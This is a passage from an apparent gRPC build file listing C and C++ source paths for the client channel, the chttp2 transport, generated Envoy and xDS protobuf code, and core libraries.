'src/core/ext/filters/client_channel/lb_policy/weighted_target/weighted_target.cc',
'src/core/ext/filters/client_channel/lb_policy/xds/cds.cc',
'src/core/ext/filters/client_channel/lb_policy/xds/xds_cluster_impl.cc',
'src/core/ext/filters/client_channel/lb_policy/xds/xds_cluster_manager.cc',
'src/core/ext/filters/client_channel/lb_policy/xds/xds_cluster_resolver.cc',
'src/core/ext/filters/client_channel/lb_policy_registry.cc',
'src/core/ext/filters/client_channel/local_subchannel_pool.cc',
'src/core/ext/filters/client_channel/proxy_mapper_registry.cc',
'src/core/ext/filters/client_channel/resolver/binder/binder_resolver.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/dns_resolver_ares.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_ev_driver_event_engine.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_ev_driver_posix.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_ev_driver_windows.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_wrapper.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_wrapper_event_engine.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_wrapper_posix.cc',
'src/core/ext/filters/client_channel/resolver/dns/c_ares/grpc_ares_wrapper_windows.cc',
'src/core/ext/filters/client_channel/resolver/dns/dns_resolver_selection.cc',
'src/core/ext/filters/client_channel/resolver/dns/native/dns_resolver.cc',
'src/core/ext/filters/client_channel/resolver/fake/fake_resolver.cc',
'src/core/ext/filters/client_channel/resolver/google_c2p/google_c2p_resolver.cc',
'src/core/ext/filters/client_channel/resolver/sockaddr/sockaddr_resolver.cc',
'src/core/ext/filters/client_channel/resolver/xds/xds_resolver.cc',
'src/core/ext/filters/client_channel/resolver_result_parsing.cc',
'src/core/ext/filters/client_channel/retry_filter.cc',
'src/core/ext/filters/client_channel/retry_service_config.cc',
'src/core/ext/filters/client_channel/retry_throttle.cc',
'src/core/ext/filters/client_channel/service_config_channel_arg_filter.cc',
'src/core/ext/filters/client_channel/subchannel.cc',
'src/core/ext/filters/client_channel/subchannel_pool_interface.cc',
'src/core/ext/filters/client_idle/client_idle_filter.cc',
'src/core/ext/filters/client_idle/idle_filter_state.cc',
'src/core/ext/filters/deadline/deadline_filter.cc',
'src/core/ext/filters/fault_injection/fault_injection_filter.cc',
'src/core/ext/filters/fault_injection/service_config_parser.cc',
'src/core/ext/filters/http/client/http_client_filter.cc',
'src/core/ext/filters/http/client_authority_filter.cc',
'src/core/ext/filters/http/http_filters_plugin.cc',
'src/core/ext/filters/http/message_compress/message_compress_filter.cc',
'src/core/ext/filters/http/message_compress/message_decompress_filter.cc',
'src/core/ext/filters/http/server/http_server_filter.cc',
'src/core/ext/filters/max_age/max_age_filter.cc',
'src/core/ext/filters/message_size/message_size_filter.cc',
'src/core/ext/filters/rbac/rbac_filter.cc',
'src/core/ext/filters/rbac/rbac_service_config_parser.cc',
'src/core/ext/filters/server_config_selector/server_config_selector.cc',
'src/core/ext/filters/server_config_selector/server_config_selector_filter.cc',
'src/core/ext/transport/chttp2/alpn/alpn.cc',
'src/core/ext/transport/chttp2/client/chttp2_connector.cc',
'src/core/ext/transport/chttp2/client/insecure/channel_create.cc',
'src/core/ext/transport/chttp2/client/insecure/channel_create_posix.cc',
'src/core/ext/transport/chttp2/client/secure/secure_channel_create.cc',
'src/core/ext/transport/chttp2/server/chttp2_server.cc',
'src/core/ext/transport/chttp2/server/insecure/server_chttp2.cc',
'src/core/ext/transport/chttp2/server/insecure/server_chttp2_posix.cc',
'src/core/ext/transport/chttp2/server/secure/server_secure_chttp2.cc',
'src/core/ext/transport/chttp2/transport/bin_decoder.cc',
'src/core/ext/transport/chttp2/transport/bin_encoder.cc',
'src/core/ext/transport/chttp2/transport/chttp2_plugin.cc',
'src/core/ext/transport/chttp2/transport/chttp2_transport.cc',
'src/core/ext/transport/chttp2/transport/context_list.cc',
'src/core/ext/transport/chttp2/transport/flow_control.cc',
'src/core/ext/transport/chttp2/transport/frame_data.cc',
'src/core/ext/transport/chttp2/transport/frame_goaway.cc',
'src/core/ext/transport/chttp2/transport/frame_ping.cc',
'src/core/ext/transport/chttp2/transport/frame_rst_stream.cc',
'src/core/ext/transport/chttp2/transport/frame_settings.cc',
'src/core/ext/transport/chttp2/transport/frame_window_update.cc',
'src/core/ext/transport/chttp2/transport/hpack_encoder.cc',
'src/core/ext/transport/chttp2/transport/hpack_encoder_table.cc',
'src/core/ext/transport/chttp2/transport/hpack_parser.cc',
'src/core/ext/transport/chttp2/transport/hpack_parser_table.cc',
'src/core/ext/transport/chttp2/transport/http2_settings.cc',
'src/core/ext/transport/chttp2/transport/huffsyms.cc',
'src/core/ext/transport/chttp2/transport/parsing.cc',
'src/core/ext/transport/chttp2/transport/stream_lists.cc',
'src/core/ext/transport/chttp2/transport/stream_map.cc',
'src/core/ext/transport/chttp2/transport/varint.cc',
'src/core/ext/transport/chttp2/transport/writing.cc',
'src/core/ext/transport/inproc/inproc_plugin.cc',
'src/core/ext/transport/inproc/inproc_transport.cc',
'src/core/ext/upb-generated/envoy/admin/v3/certs.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/clusters.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/config_dump.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/init_dump.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/listeners.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/memory.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/metrics.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/mutex_stats.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/server_info.upb.c',
'src/core/ext/upb-generated/envoy/admin/v3/tap.upb.c',
'src/core/ext/upb-generated/envoy/annotations/deprecation.upb.c',
'src/core/ext/upb-generated/envoy/annotations/resource.upb.c',
'src/core/ext/upb-generated/envoy/config/accesslog/v3/accesslog.upb.c',
'src/core/ext/upb-generated/envoy/config/bootstrap/v3/bootstrap.upb.c',
'src/core/ext/upb-generated/envoy/config/cluster/v3/circuit_breaker.upb.c',
'src/core/ext/upb-generated/envoy/config/cluster/v3/cluster.upb.c',
'src/core/ext/upb-generated/envoy/config/cluster/v3/filter.upb.c',
'src/core/ext/upb-generated/envoy/config/cluster/v3/outlier_detection.upb.c',
'src/core/ext/upb-generated/envoy/config/common/matcher/v3/matcher.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/address.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/backoff.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/base.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/config_source.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/event_service_config.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/extension.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/grpc_method_list.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/grpc_service.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/health_check.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/http_uri.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/protocol.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/proxy_protocol.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/resolver.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/socket_option.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/substitution_format_string.upb.c',
'src/core/ext/upb-generated/envoy/config/core/v3/udp_socket_config.upb.c',
'src/core/ext/upb-generated/envoy/config/endpoint/v3/endpoint.upb.c',
'src/core/ext/upb-generated/envoy/config/endpoint/v3/endpoint_components.upb.c',
'src/core/ext/upb-generated/envoy/config/endpoint/v3/load_report.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/api_listener.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/listener.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/listener_components.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/quic_config.upb.c',
'src/core/ext/upb-generated/envoy/config/listener/v3/udp_listener_config.upb.c',
'src/core/ext/upb-generated/envoy/config/metrics/v3/metrics_service.upb.c',
'src/core/ext/upb-generated/envoy/config/metrics/v3/stats.upb.c',
'src/core/ext/upb-generated/envoy/config/overload/v3/overload.upb.c',
'src/core/ext/upb-generated/envoy/config/rbac/v3/rbac.upb.c',
'src/core/ext/upb-generated/envoy/config/route/v3/route.upb.c',
'src/core/ext/upb-generated/envoy/config/route/v3/route_components.upb.c',
'src/core/ext/upb-generated/envoy/config/route/v3/scoped_route.upb.c',
'src/core/ext/upb-generated/envoy/config/tap/v3/common.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/datadog.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/dynamic_ot.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/http_tracer.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/lightstep.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/opencensus.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/service.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/skywalking.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/trace.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/xray.upb.c',
'src/core/ext/upb-generated/envoy/config/trace/v3/zipkin.upb.c',
'src/core/ext/upb-generated/envoy/extensions/clusters/aggregate/v3/cluster.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/common/fault/v3/fault.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/http/fault/v3/fault.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/http/rbac/v3/rbac.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/http/router/v3/router.upb.c',
'src/core/ext/upb-generated/envoy/extensions/filters/network/http_connection_manager/v3/http_connection_manager.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/cert.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/common.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/secret.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/tls.upb.c',
'src/core/ext/upb-generated/envoy/extensions/transport_sockets/tls/v3/tls_spiffe_validator_config.upb.c',
'src/core/ext/upb-generated/envoy/service/discovery/v3/ads.upb.c',
'src/core/ext/upb-generated/envoy/service/discovery/v3/discovery.upb.c',
'src/core/ext/upb-generated/envoy/service/load_stats/v3/lrs.upb.c',
'src/core/ext/upb-generated/envoy/service/status/v3/csds.upb.c',
'src/core/ext/upb-generated/envoy/type/http/v3/cookie.upb.c',
'src/core/ext/upb-generated/envoy/type/http/v3/path_transformation.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/http_inputs.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/metadata.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/node.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/number.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/path.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/regex.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/string.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/struct.upb.c',
'src/core/ext/upb-generated/envoy/type/matcher/v3/value.upb.c',
'src/core/ext/upb-generated/envoy/type/metadata/v3/metadata.upb.c',
'src/core/ext/upb-generated/envoy/type/tracing/v3/custom_tag.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/hash_policy.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/http.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/http_status.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/percent.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/range.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/ratelimit_unit.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/semantic_version.upb.c',
'src/core/ext/upb-generated/envoy/type/v3/token_bucket.upb.c',
'src/core/ext/upb-generated/google/api/annotations.upb.c',
'src/core/ext/upb-generated/google/api/expr/v1alpha1/checked.upb.c',
'src/core/ext/upb-generated/google/api/expr/v1alpha1/syntax.upb.c',
'src/core/ext/upb-generated/google/api/http.upb.c',
'src/core/ext/upb-generated/google/api/httpbody.upb.c',
'src/core/ext/upb-generated/google/protobuf/any.upb.c',
'src/core/ext/upb-generated/google/protobuf/descriptor.upb.c',
'src/core/ext/upb-generated/google/protobuf/duration.upb.c',
'src/core/ext/upb-generated/google/protobuf/empty.upb.c',
'src/core/ext/upb-generated/google/protobuf/struct.upb.c',
'src/core/ext/upb-generated/google/protobuf/timestamp.upb.c',
'src/core/ext/upb-generated/google/protobuf/wrappers.upb.c',
'src/core/ext/upb-generated/google/rpc/status.upb.c',
'src/core/ext/upb-generated/opencensus/proto/trace/v1/trace_config.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/gcp/altscontext.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/gcp/handshaker.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/gcp/transport_security_common.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/health/v1/health.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/lb/v1/load_balancer.upb.c',
'src/core/ext/upb-generated/src/proto/grpc/lookup/v1/rls.upb.c',
'src/core/ext/upb-generated/udpa/annotations/migrate.upb.c',
'src/core/ext/upb-generated/udpa/annotations/security.upb.c',
'src/core/ext/upb-generated/udpa/annotations/sensitive.upb.c',
'src/core/ext/upb-generated/udpa/annotations/status.upb.c',
'src/core/ext/upb-generated/udpa/annotations/versioning.upb.c',
'src/core/ext/upb-generated/validate/validate.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/migrate.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/security.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/sensitive.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/status.upb.c',
'src/core/ext/upb-generated/xds/annotations/v3/versioning.upb.c',
'src/core/ext/upb-generated/xds/core/v3/authority.upb.c',
'src/core/ext/upb-generated/xds/core/v3/collection_entry.upb.c',
'src/core/ext/upb-generated/xds/core/v3/context_params.upb.c',
'src/core/ext/upb-generated/xds/core/v3/extension.upb.c',
'src/core/ext/upb-generated/xds/core/v3/resource.upb.c',
'src/core/ext/upb-generated/xds/core/v3/resource_locator.upb.c',
'src/core/ext/upb-generated/xds/core/v3/resource_name.upb.c',
'src/core/ext/upb-generated/xds/data/orca/v3/orca_load_report.upb.c',
'src/core/ext/upb-generated/xds/type/matcher/v3/matcher.upb.c',
'src/core/ext/upb-generated/xds/type/matcher/v3/regex.upb.c',
'src/core/ext/upb-generated/xds/type/matcher/v3/string.upb.c',
'src/core/ext/upb-generated/xds/type/v3/typed_struct.upb.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/certs.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/clusters.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/config_dump.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/init_dump.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/listeners.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/memory.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/metrics.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/mutex_stats.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/server_info.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/admin/v3/tap.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/annotations/deprecation.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/annotations/resource.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/accesslog/v3/accesslog.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/bootstrap/v3/bootstrap.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/cluster/v3/circuit_breaker.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/cluster/v3/cluster.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/cluster/v3/filter.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/cluster/v3/outlier_detection.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/common/matcher/v3/matcher.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/address.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/backoff.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/base.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/config_source.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/event_service_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/extension.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/grpc_method_list.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/grpc_service.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/health_check.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/http_uri.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/protocol.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/proxy_protocol.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/resolver.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/socket_option.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/substitution_format_string.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/core/v3/udp_socket_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/endpoint/v3/endpoint.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/endpoint/v3/endpoint_components.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/endpoint/v3/load_report.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/api_listener.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/listener.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/listener_components.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/quic_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/listener/v3/udp_listener_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/metrics/v3/metrics_service.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/metrics/v3/stats.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/overload/v3/overload.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/rbac/v3/rbac.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/route/v3/route.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/route/v3/route_components.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/route/v3/scoped_route.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/tap/v3/common.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/datadog.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/dynamic_ot.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/http_tracer.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/lightstep.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/opencensus.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/service.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/skywalking.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/trace.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/xray.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/config/trace/v3/zipkin.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/clusters/aggregate/v3/cluster.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/common/fault/v3/fault.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/http/fault/v3/fault.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/http/rbac/v3/rbac.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/http/router/v3/router.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/filters/network/http_connection_manager/v3/http_connection_manager.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/cert.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/common.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/secret.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/tls.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/extensions/transport_sockets/tls/v3/tls_spiffe_validator_config.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/service/discovery/v3/ads.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/service/discovery/v3/discovery.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/service/load_stats/v3/lrs.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/service/status/v3/csds.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/http/v3/cookie.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/http/v3/path_transformation.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/http_inputs.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/metadata.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/node.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/number.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/path.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/regex.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/string.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/struct.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/matcher/v3/value.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/metadata/v3/metadata.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/tracing/v3/custom_tag.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/hash_policy.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/http.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/http_status.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/percent.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/range.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/ratelimit_unit.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/semantic_version.upbdefs.c',
'src/core/ext/upbdefs-generated/envoy/type/v3/token_bucket.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/annotations.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/expr/v1alpha1/checked.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/expr/v1alpha1/syntax.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/http.upbdefs.c',
'src/core/ext/upbdefs-generated/google/api/httpbody.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/any.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/descriptor.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/duration.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/empty.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/struct.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/timestamp.upbdefs.c',
'src/core/ext/upbdefs-generated/google/protobuf/wrappers.upbdefs.c',
'src/core/ext/upbdefs-generated/google/rpc/status.upbdefs.c',
'src/core/ext/upbdefs-generated/opencensus/proto/trace/v1/trace_config.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/migrate.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/security.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/sensitive.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/status.upbdefs.c',
'src/core/ext/upbdefs-generated/udpa/annotations/versioning.upbdefs.c',
'src/core/ext/upbdefs-generated/validate/validate.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/migrate.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/security.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/sensitive.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/status.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/annotations/v3/versioning.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/authority.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/collection_entry.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/context_params.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/extension.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/resource.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/resource_locator.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/core/v3/resource_name.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/type/matcher/v3/matcher.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/type/matcher/v3/regex.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/type/matcher/v3/string.upbdefs.c',
'src/core/ext/upbdefs-generated/xds/type/v3/typed_struct.upbdefs.c',
'src/core/ext/xds/certificate_provider_registry.cc',
'src/core/ext/xds/certificate_provider_store.cc',
'src/core/ext/xds/file_watcher_certificate_provider_factory.cc',
'src/core/ext/xds/xds_api.cc',
'src/core/ext/xds/xds_bootstrap.cc',
'src/core/ext/xds/xds_certificate_provider.cc',
'src/core/ext/xds/xds_channel_creds.cc',
'src/core/ext/xds/xds_channel_stack_modifier.cc',
'src/core/ext/xds/xds_client.cc',
'src/core/ext/xds/xds_client_stats.cc',
'src/core/ext/xds/xds_cluster.cc',
'src/core/ext/xds/xds_common_types.cc',
'src/core/ext/xds/xds_endpoint.cc',
'src/core/ext/xds/xds_http_fault_filter.cc',
'src/core/ext/xds/xds_http_filters.cc',
'src/core/ext/xds/xds_http_rbac_filter.cc',
'src/core/ext/xds/xds_listener.cc',
'src/core/ext/xds/xds_resource_type.cc',
'src/core/ext/xds/xds_route_config.cc',
'src/core/ext/xds/xds_routing.cc',
'src/core/ext/xds/xds_server_config_fetcher.cc',
'src/core/lib/address_utils/parse_address.cc',
'src/core/lib/address_utils/sockaddr_utils.cc',
'src/core/lib/backoff/backoff.cc',
'src/core/lib/channel/channel_args.cc',
'src/core/lib/channel/channel_args_preconditioning.cc',
'src/core/lib/channel/channel_stack.cc',
'src/core/lib/channel/channel_stack_builder.cc',
'src/core/lib/channel/channel_trace.cc',
'src/core/lib/channel/channelz.cc',
'src/core/lib/channel/channelz_registry.cc',
'src/core/lib/channel/connected_channel.cc',
'src/core/lib/channel/handshaker.cc',
'src/core/lib/channel/handshaker_registry.cc',
'src/core/lib/channel/status_util.cc',
'src/core/lib/compression/compression.cc',
'src/core/lib/compression/compression_internal.cc',
'src/core/lib/compression/message_compress.cc',
'src/core/lib/config/core_configuration.cc',
'src/core/lib/debug/stats.cc',
'src/core/lib/debug/stats_data.cc',
'src/core/lib/debug/trace.cc',
'src/core/lib/event_engine/channel_args_endpoint_config.cc',
'src/core/lib/event_engine/event_engine.cc',
'src/core/lib/event_engine/event_engine_factory.cc',
'src/core/lib/event_engine/memory_allocator.cc',
'src/core/lib/event_engine/sockaddr.cc',
'src/core/lib/gpr/alloc.cc',
'src/core/lib/gpr/atm.cc',
'src/core/lib/gpr/cpu_iphone.cc',
'src/core/lib/gpr/cpu_linux.cc',
'src/core/lib/gpr/cpu_posix.cc',
'src/core/lib/gpr/cpu_windows.cc',
'src/core/lib/gpr/env_linux.cc',
'src/core/lib/gpr/env_posix.cc',
'src/core/lib/gpr/env_windows.cc',
'src/core/lib/gpr/log.cc',
'src/core/lib/gpr/log_android.cc',
'src/core/lib/gpr/log_linux.cc',
'src/core/lib/gpr/log_posix.cc',
'src/core/lib/gpr/log_windows.cc',
'src/core/lib/gpr/murmur_hash.cc',
'src/core/lib/gpr/string.cc',
'src/core/lib/gpr/string_posix.cc',
'src/core/lib/gpr/string_util_windows.cc',
'src/core/lib/gpr/string_windows.cc',
'src/core/lib/gpr/sync.cc',
'src/core/lib/gpr/sync_abseil.cc',
'src/core/lib/gpr/sync_posix.cc',
'src/core/lib/gpr/sync_windows.cc',
'src/core/lib/gpr/time.cc',
'src/core/lib/gpr/time_posix.cc',
'src/core/lib/gpr/time_precise.cc',
'src/core/lib/gpr/time_windows.cc',
'src/core/lib/gpr/tmpfile_msys.cc',
'src/core/lib/gpr/tmpfile_posix.cc',
'src/core/lib/gpr/tmpfile_windows.cc',
'src/core/lib/gpr/wrap_memcpy.cc',
'src/core/lib/gprpp/examine_stack.cc',
'src/core/lib/gprpp/fork.cc',
'src/core/lib/gprpp/global_config_env.cc',
'src/core/lib/gprpp/host_port.cc',
'src/core/lib/gprpp/mpscq.cc',
